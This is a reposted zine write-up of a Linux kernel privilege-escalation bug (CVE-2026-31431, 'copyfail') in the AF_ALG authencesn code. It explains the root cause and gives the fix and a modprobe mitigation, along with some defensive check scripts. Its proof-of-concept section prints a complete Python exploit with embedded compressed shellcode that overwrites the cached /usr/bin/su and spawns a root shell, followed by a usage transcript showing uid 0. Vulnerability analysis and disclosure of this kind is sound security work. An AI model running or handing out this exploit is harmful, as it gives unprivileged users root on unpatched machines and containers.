732-Bytes to Pwn Linux Kernel
This is a zine repost.
https://ghspace.fr/zine/old/732_bytes_to_pwn_linux_kernel.txt
|=-----------------------------------------------------------------------=|
|=----------------=[ 732-bytes to pwn linux kernel ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ Beemo ]=--------------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of Contents
0x01 - Intro
0x02 - Dramatis Personae - subsystems
0x03 - The bug nobody saw for 9 years
0x04 - authencesn, ya cheating little bastard
0x05 - From 1000 to 0
0x06 - Proof of concept
0x07 - Howtf nobody noticed
0x08 - The fix (4 lines)
0x09 - Thoughts on copyfail
0x0a - References
--[ 0x01 - Intro
"Every so often, a bug comes along that makes you question whether
anyone ever reads the code they're committing to."
Every kernel LPE starts the same way. Here's another race
condition. Here's the window. Here's the heap spray. Here's the
KASLR leak. Here's the stack pivot and yada yada yada.
Good luck making it work twice.
Copyfail (CVE-2026-31431) - recently found by Taeyang Lee with a
little help from AI - doesn't do any of that.
No race. No heap spray. No KASLR bypass. No ROP chain. No compiled
binary. Just a logic flaw sitting in plain sight since 2017,
weaponizable in 732 bytes of Python, yielding a juicy root shell
on every major distro shipped in the last nine years.
You don't even need to be fast. Just a loop, four bytes
at a time, from a Python script.
So, how does it work?
--[ 0x02 - Dramatis Personae - subsystems
Three kernel subsystems walk into a bar. They've never met.
Each one is fine alone; together they give any local user a write4
primitive into the page cache of any readable file O_o
[*] AF_ALG
AF_ALG (address family 38) is a socket type that exposes the
kernel's crypto subsystem to userspace, no capabilities needed.
Any user can open one, bind to any registered alg template,
and run encrypt/decrypt operations. It exists so userspace
can offload crypto to hw accelerators without needing a
kernel module per application.
In practice, almost nobody uses it. OpenSSL's afalg engine is
off by default but most distros compile it in anyway.
>>> a = socket.socket(38, 5, 0) # AF_ALG, SOCK_SEQPACKET
>>> a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
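A quick way to see whether a box even exposes this interface: the
sketch below tries the same bind and reports whether the kernel
accepted it. The function name aead_template_exposed is made up for
this note. A True result only says the template is reachable from
userspace; it says nothing about whether the kernel is patched.

```python
import socket


def aead_template_exposed(name="authencesn(hmac(sha256),cbc(aes))"):
    """Return True if an unprivileged AF_ALG bind to this AEAD template works."""
    af_alg = getattr(socket, "AF_ALG", None)  # missing on non-Linux builds
    if af_alg is None:
        return False
    try:
        with socket.socket(af_alg, socket.SOCK_SEQPACKET, 0) as sock:
            sock.bind(("aead", name))
        return True
    except OSError:
        # No AF_ALG support, unknown template, module blocked, sandboxed, ...
        return False


if __name__ == "__main__":
    print("authencesn reachable via AF_ALG:", aead_template_exposed())
```

Nothing is keyed, sent, or decrypted here; the socket is closed right
after the bind.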
[*] splice()
splice() moves data between fds and pipes without copying. When
you splice FROM a file, the pipe doesn't get a copy of the data.
It gets a reference to the page cache page. The actual physical
page.
>>> splice(file_fd -> pipe) # pipe now holds page cache ref
>>> splice(pipe -> alg_fd) # alg socket now holds page cache ref
When you then splice from the pipe into another fd
(like our AF_ALG socket), those page cache references travel into
the crypto subsystem's scatterlist.
That scatterlist now contains direct pointers to the physical
pages that back every read(), mmap(), and execve() of that file
on the entire system.
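To get a feel for splice() on its own, here is a minimal and harmless
sketch, assuming Python 3.10+ (where os.splice exists) and a throwaway
temp file. It moves bytes from a file into a pipe and reads them back.
The helper name splice_file_to_pipe is hypothetical.

```python
import os
import tempfile


def splice_file_to_pipe(data):
    """Splice `data` from a temp file into a pipe and read it back out."""
    if not hasattr(os, "splice"):      # Python < 3.10 or non-Linux
        return None
    with tempfile.NamedTemporaryFile() as tmp:
        tmp.write(data)
        tmp.flush()
        fd = os.open(tmp.name, os.O_RDONLY)
        r, w = os.pipe()
        try:
            # file -> pipe: the kernel hands the pipe page references,
            # no userspace buffer is involved in this step
            moved = os.splice(fd, w, len(data), offset_src=0)
            return os.read(r, moved)
        finally:
            for x in (fd, r, w):
                os.close(x)


if __name__ == "__main__":
    print(splice_file_to_pipe(b"hello page cache"))
```

Keep the payload small (well under the pipe capacity), otherwise the
single os.read() may not drain everything.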
[*] authencesn
authencesn is an AEAD wrapper. It exists for IPsec Extended
Sequence Numbers (RFC 4303), where 64-bit sequence numbers are
split across the AAD.
The wrapper has to rearrange bytes for HMAC computation.
To do it, it uses the caller's output buffer as a scratch space,
writing 4 bytes past the end of the legitimate output area.
--[ 0x03 - The bug nobody saw for 9 years
In the old code (pre-2017), src and dst were separate. Page
cache pages were in src (read side). The output went to dst
(user buffer). Safe.
In 2017, commit 72548b093ee3 added an optimization to algif_aead.c:
perform AEAD operations in-place.
For decryption, the code now:
- Copies AAD and ciphertext from the TX scatterlist (which may
contain page cache pages from splice) into the RX buffer
(the user's recvmsg buffer).
- Does NOT copy the authentication tag. Instead, it chains the
tag pages from the TX scatterlist onto the end of the RX
scatterlist using sg_chain().
- Sets req->src = req->dst
(both point to the same combined scatterlist).
req->src ----+
             |
             v
req->dst --> [ AAD || CT ] --> [ Tag (page cache pages) ]
             ^^^^^^^^^^^^^     ^^^^^^^^^^^^^^^^^^^^^^^^^^
             \ RX buffer       \ chained from TX SGL
               (user mem)        (file's page cache)
The output scatterlist now has a writable zone (the RX buffer)
followed immediately by page cache pages of whatever file was
spliced in. Nothing enforces the boundary between them. Nothing
documents this as a constraint. It's a silent invariant that every
AEAD algorithm is expected to honor.
Every AEAD algorithm, indeed... except one.
--[ 0x04 - authencesn, ya cheating little bastard
authencesn handles IPsec Extended Sequence Numbers. 64-bit
seqno split into hi (bytes 0-3) and lo (bytes 4-7) of the AAD.
During decrypt, it needs to rearrange these bytes for the HMAC.
Instead of allocating a scratch buffer it uses the caller's
destination scatterlist as a notepad:
crypto_authenc_esn_decrypt() ->
>>> // read first 8 bytes of AAD (seqno_hi || seqno_lo)
>>> scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);
>>>
>>> // write seqno_hi at dst[4..7] (within AAD, fine)
>>> scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
>>>
>>> // write seqno_lo at dst[assoclen + cryptlen] (PAST THE END)
>>> scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
^^^^^^^^^^^^^^^^^^^^
\ bug here!
That third write goes 4 bytes past the legitimate output boundary.
scatterwalk_map_and_copy() faithfully walks the scatterlist, hits
the sg_chain boundary, maps the page cache page via
kmap_local_page(), and writes 4 bytes of payload data directly
into the kernel's cached copy of the target file.
The HMAC check runs, fails (the ciphertext is garbage - don't
care), recvmsg() returns -EBADMSG. Nobody checks the page cache.
The corrupted page is never marked dirty. The file on disk is
unchanged. But every subsequent read of that file, from any process,
from any container, sees the corrupted version.
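The boundary crossing is easier to see in a toy model. The sketch
below is pure userspace Python, with no kernel interfaces involved: a
"scatterlist" is just a list of bytearrays, and sg_write() is a
hypothetical stand-in for scatterwalk_map_and_copy() in write mode.
The lengths (assoclen=8, cryptlen=16) and the fake file contents are
made-up values for illustration.

```python
def sg_write(segments, offset, data):
    """Copy data to a logical offset in a chain of bytearray segments."""
    for seg in segments:
        if offset >= len(seg):          # not in this segment, keep walking
            offset -= len(seg)
            continue
        n = min(len(seg) - offset, len(data))
        seg[offset:offset + n] = data[:n]
        data, offset = data[n:], 0      # spill over into the next segment
        if not data:
            return
    if data:
        raise ValueError("write runs past the end of the chain")


def simulate(payload=b"\xde\xad\xbe\xef", assoclen=8, cryptlen=16):
    rx_buffer = bytearray(assoclen + cryptlen)       # user memory: AAD || CT
    page_cache = bytearray(b"ORIGINAL FILE BYTES")   # stand-in for the chained tag page
    dst = [rx_buffer, page_cache]                    # the combined in-place list

    rx_buffer[:8] = b"AAAA" + payload                # AAD as the caller sent it
    tmp = bytes(rx_buffer[:8])                       # read first 8 bytes of AAD
    sg_write(dst, 4, tmp[:4])                        # stays inside the AAD
    sg_write(dst, assoclen + cryptlen, tmp[4:8])     # first byte past the RX buffer
    return bytes(rx_buffer), bytes(page_cache)


if __name__ == "__main__":
    rx, page = simulate()
    print(page)
```

The walker has no notion of "user memory ends here". An offset of
assoclen + cryptlen simply resolves to byte 0 of the next segment,
which in the real layout is a page belonging to the file.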
--[ 0x05 - From 1000 to 0
The full sequence:
1. Open socket(AF_ALG), bind to authencesn(hmac(sha256),cbc(aes)).
Set a key. Accept a request socket.
2. Open /usr/bin/su (or any setuid binary) for reading.
3. For each 4-byte chunk of your shellcode:
a. sendmsg(AAD[8 bytes], cmsg=[DECRYPT, IV, ASSOCLEN=8], MSG_MORE)
Where bytes[4:8] = the 4 bytes to write.
Set assoclen, IV, etc. via cmsg headers.
b. splice() from /usr/bin/su into a pipe, then from the pipe
into the AF_ALG socket.
splice(target_fd -> pipe, offset=target_page_offset, len=32)
splice(pipe -> op_fd, len=32)
Choose offset so that the tag region aligns with your target
offset in su's .text section.
c. recv(op_fd)
^^^^^^^^^^
\ -EBADMSG, but scratch write already fired
Triggers the decrypt. authencesn writes your 4
bytes into the page cache. HMAC fails. recv() returns
error. The page cache is corrupted. Move to next chunk.
4. execve("/usr/bin/su"). The kernel loads su from the page
cache. Your shellcode is in .text. su is setuid root.
Congrats, you now root :D
Every process reading that file through the page cache sees the
corruption. execve() loads from the page cache. getpwnam() reads
from the page cache. But the on-disk file is untouched: fsck is clean,
tripwire is clean, AIDE is clean, because nothing was written to disk.
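One way a defender might look for this kind of divergence is to compare
a normal buffered read (served from the page cache) with an O_DIRECT
read (which asks the filesystem to go to storage). The sketch below is
an illustration under assumptions, not a vetted detection tool: the
function name is hypothetical, the 4096-byte block is a guess at the
alignment your filesystem wants, and some filesystems refuse O_DIRECT
outright, in which case it returns None.

```python
import hashlib
import mmap
import os


def cached_matches_direct(path, block=4096):
    """True/False if both reads worked, None if O_DIRECT is unavailable."""
    with open(path, "rb") as fh:              # buffered read: page cache view
        cached = hashlib.sha256(fh.read()).hexdigest()

    o_direct = getattr(os, "O_DIRECT", 0)
    if not o_direct:
        return None
    try:
        fd = os.open(path, os.O_RDONLY | o_direct)
    except OSError:
        return None

    buf = mmap.mmap(-1, block)                # anonymous mapping, page-aligned
    direct = hashlib.sha256()
    offset = 0
    try:
        while True:
            n = os.preadv(fd, [buf], offset)  # always issued at an aligned offset
            direct.update(buf[:n])
            if n < block:                     # short read means end of file
                break
            offset += n
    except OSError:
        return None
    finally:
        buf.close()
        os.close(fd)
    return direct.hexdigest() == cached


if __name__ == "__main__":
    print(cached_matches_direct("/usr/bin/su"))
```

A False here would mean the cached bytes and the stored bytes disagree
for a file nobody is supposed to be writing to.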
No races to win. No timing windows. No kernel version checks. No
arch-specific gadgets. The same script works on:
Ubuntu 24.04 (6.17.0-1007-aws)
Amazon Linux (6.18.8-9.213.amzn2023)
RHEL 10.1 (6.12.0-124.45.1.el10_1)
SUSE 16 (6.12.0-160000.9-default)
...and every other distro that ships the default kernel config with
AF_ALG enabled.
--[ 0x06 - Proof of concept
The full exploit is 732 bytes minified, but I'll add some
comments for context. You can find the original one here:
https://github.com/theori-io/copy-fail-CVE-2026-31431
--8<-- cut here ---------------------------------------------------[[ BEGIN
#!/usr/bin/env python3
import os as g, zlib, socket as s
def d(x): return bytes.fromhex(x) # htob
def c(f, t, c):
# f = fd of target file (/usr/bin/su)
# t = offset within file to write at
# c = 4 bytes to write (shellcode chunk)
# Open AF_ALG socket, bind authencesn
# socket(family=AF_ALG, type=SOCK_SEQPACKET, proto=0)
# https://docs.python.org/3/library/socket.html#socket.socket
a = s.socket(38, 5, 0)
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
h = 279 # SOL_ALG
# Set key: 8-byte rtattr header (enckeylen = 16) + 32 zero bytes of
# key material (16-byte HMAC key, then 16-byte AES-128 key)
v = a.setsockopt
v(h, 1, d('0800010000000010' + '0'*64))
# Set the AEAD tag length (opt 5 = ALG_SET_AEAD_AUTHSIZE) to 4 bytes
v(h, 5, None, 4)
# Accept request fd
u, _ = a.accept()
o = t + 4 # offset adjustment
# sendmsg()
# (AAD = b"A"*4 + seqno_lo)
# (SOL_ALG, ALG_SET_OP) = decrypt (0x00 * 4)
# (SOL_ALG, ALG_SET_IV) = 16 null bytes
# (SOL_ALG, ALG_SET_AEAD_ASSOCLEN) = 8
i = d('00')
u.sendmsg(
[b"A"*4 + c], # AAD with payload in seqno_lo
[
(h, 3, i*4), # ALG_SET_OP = decrypt
(h, 2, b'\x10' + i*19), # ALG_SET_IV = 16 zero bytes
(h, 4, b'\x08' + i*3), # AEAD_ASSOCLEN = 8
],
32768 # MSG_MORE
)
# splice target file pages into AF_ALG socket
r, w = g.pipe()
n = g.splice
n(f, w, o, offset_src=0) # file -> pipe (page cache refs!)
n(r, u.fileno(), o) # pipe -> AF_ALG socket
# trigger decrypt (authencesn writes seqno_lo into page cache)
try:
u.recv(8 + t)
except:
pass # EBADMSG expected
f = g.open("/usr/bin/su", 0) # O_RDONLY
i = 0
# Decompress shellcode (execve("/bin/sh") or similar)
e = zlib.decompress(d(
"78daab77f57163626464800126063b0610af82c101cc7760c004"
"0e0c160c301d209a154d16999e07e5c1680601086578c0f0ff86"
"4c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa4999"
"79fac5190c0c0c0032c310d3"
))
# Write shellcode 4 bytes at a time into su's page cache
while i < len(e):
c(f, i, e[i:i+4])
i += 4
# Execute the corrupted setuid binary
g.system("su")
# Dang, you root :D
--8<-- cut here -----------------------------------------------------[[ EOS
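For readers decoding the magic numbers in the listing: the sketch
below maps them to the names Python's socket module uses on Linux and
unpacks the key blob passed with option 1. The helper names are
hypothetical, and the "<HH" unpack assumes a little-endian host, since
struct rtattr is in native byte order.

```python
import socket
import struct

# Literal values as they appear in the listing above.
LITERALS = {
    "AF_ALG": 38, "SOCK_SEQPACKET": 5, "SOL_ALG": 279,
    "ALG_SET_KEY": 1, "ALG_SET_IV": 2, "ALG_SET_OP": 3,
    "ALG_SET_AEAD_ASSOCLEN": 4, "ALG_SET_AEAD_AUTHSIZE": 5,
    "ALG_OP_DECRYPT": 0, "MSG_MORE": 32768,
}


def check_constants():
    """Compare each literal with the socket module's constant, if present."""
    return {name: getattr(socket, name, value) == value
            for name, value in LITERALS.items()}


def decode_key_blob(blob):
    """Split an authenc-style key blob into its header fields and lengths."""
    rta_len, rta_type = struct.unpack_from("<HH", blob, 0)  # struct rtattr
    (enckeylen,) = struct.unpack_from(">I", blob, 4)        # big-endian u32
    material = blob[rta_len:]                               # auth key, then enc key
    return {
        "rta_len": rta_len,
        "rta_type": rta_type,
        "enckeylen": enckeylen,
        "authkeylen": len(material) - enckeylen,
    }


if __name__ == "__main__":
    print(check_constants())
    print(decode_key_blob(bytes.fromhex("0800010000000010" + "0" * 64)))
```

So the blob carries a 16-byte HMAC key and a 16-byte cipher key, all
zeros. The key never has to be valid for anything, because the HMAC
check is expected to fail.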
Usage:
$ python3 copy_fail_exp.py
$ id
uid=0(root) gid=1002(user) groups=1002(user)
That's it. 732 bytes. Every distro. Every time.
--[ 0x07 - Howtf nobody noticed
Well... the bug exists because of three independently reasonable
changes by three different developers across six years:
2011: authencesn added to support IPsec ESN (a5079d084f8b).
The scratch write at dst[assoclen+cryptlen] is harmless -
the only caller is the in-kernel xfrm layer, and src/dst
are separate scatterlists. Nobody outside the kernel ever
touches this code.
2015: AF_ALG gains AEAD support (algif_aead.c). splice() can
now deliver page cache pages into the crypto scatterlist.
authencesn is converted to the new AEAD API (104880a6b470).
But AF_ALG uses out-of-place: req->src != req->dst. Page
cache pages are in src (read-only). The scratch write goes
to dst. Still not exploitable as is.
2017: In-place optimization (72548b093ee3). req->src = req->dst.
Page cache tag pages are chained into the writable
destination via sg_chain(). authencesn's scratch write now
crosses from the RX buffer into page cache pages.
The corruption is silent - no crash, no kernel log, no visible
side effect except the page cache being wrong. It doesn't trigger any
existing kernel self check. No KASAN or UBSAN. No lockdep. No page flags.
The kernel doesn't know the page is corrupted because the write
went through a legitimate code path (scatterwalk_map_and_copy) on a page
that was legitimately mapped.
--[ 0x08 - The fix (4 lines)
Commit a664bf3d603d reverts algif_aead.c to out-of-place operation:
diff --git a/before b/after
index aff63c7..9ca2c95 100644
--- a/before
+++ b/after
@@ -1,5 +1,5 @@
aead_request_set_crypt(
&areq->cra_u.aead_req,
-rsgl_src, // RX SGL (same as dst)
-areq->first_rsgl.sgl.sgt.sgl, // RX SGL
+tsgl_src, // TX SGL (src)
+areq->first_rsgl.sgl.sgt.sgl, // RX SGL (dst, separate)
used, ctx->iv);
The commit message: "There is no benefit in operating in-place in
algif_aead since the source and destination come from different
mappings."
You can temporarily mitigate if you're not able to patch yet:
$ echo "install algif_aead /bin/false" \
> /etc/modprobe.d/disable-algif-aead.conf
$ rmmod algif_aead 2>/dev/null
This kills the AF_ALG AEAD socket type. You'll break apps, yes,
but only those that explicitly bind aead sockets via AF_ALG, which in
practice is almost none.
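To confirm the mitigation took, something like the sketch below could
be run on each host. It assumes the standard /proc/modules format and
the config path used above. Both helper names are hypothetical, and
the install-rule check is a deliberately simple string match, not a
full modprobe.d parser.

```python
import os


def module_loaded(proc_modules_text, name="algif_aead"):
    """True if `name` appears as a loaded module in /proc/modules text."""
    return any(line.split()[0] == name
               for line in proc_modules_text.splitlines() if line.strip())


def install_rule_present(conf_text, name="algif_aead"):
    """True if the text has an 'install <name> <command>' override line."""
    for line in conf_text.splitlines():
        fields = line.split("#", 1)[0].split()   # drop trailing comments
        if fields[:2] == ["install", name] and len(fields) > 2:
            return True
    return False


if __name__ == "__main__":
    conf = "/etc/modprobe.d/disable-algif-aead.conf"
    with open("/proc/modules") as fh:
        print("module loaded:", module_loaded(fh.read()))
    if os.path.exists(conf):
        with open(conf) as fh:
            print("install rule :", install_rule_present(fh.read()))
    else:
        print("install rule : config file not found")
```

You want "module loaded: False" and "install rule : True". If
algif_aead is built into the kernel rather than shipped as a module,
neither check tells you much.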
--[ 0x09 - Thoughts on copyfail
Copyfail might be the cleanest kernel LPE in recent history.
It doesn't need a race. It doesn't need a spray. Definitely no leaks.
It doesn't even need a compiled binary. A 732-byte Python script,
using only stdlib modules, gets you root on every major Linux
distribution shipped since 2017. The same script crosses container
boundaries because the page cache is host-wide.
--[ 0x0a - References
[1] CVE-2026-31431 disclosure
https://copy.fail/
[2] Xint Code write-up
https://xint.io/blog/copy-fail-linux-distributions
[3] PoC source
https://github.com/theori-io/copy-fail-CVE-2026-31431
[4] Kernel fix (a664bf3d603d)
https://github.com/torvalds/linux/commit/a664bf3d603d
[5] In-place optimization commit (72548b093ee3)
https://github.com/torvalds/linux/commit/72548b093ee3
[6] authencesn original commit (a5079d084f8b)
https://github.com/torvalds/linux/commit/a5079d084f8b
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
| _ === B____ _e_ .
- - ( `\( ) | __ |e__| -_|___m_ __o |
| `> /~\ _* | __ -| -_|___| | . | - -
(_/ /\/ |_____|___| |_|_|_|___| |
* \ \ nflatrea@mailo.com
`./ https://nflatrea.bearblog.dev *
- Made with <3 ... .
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
--[ EOF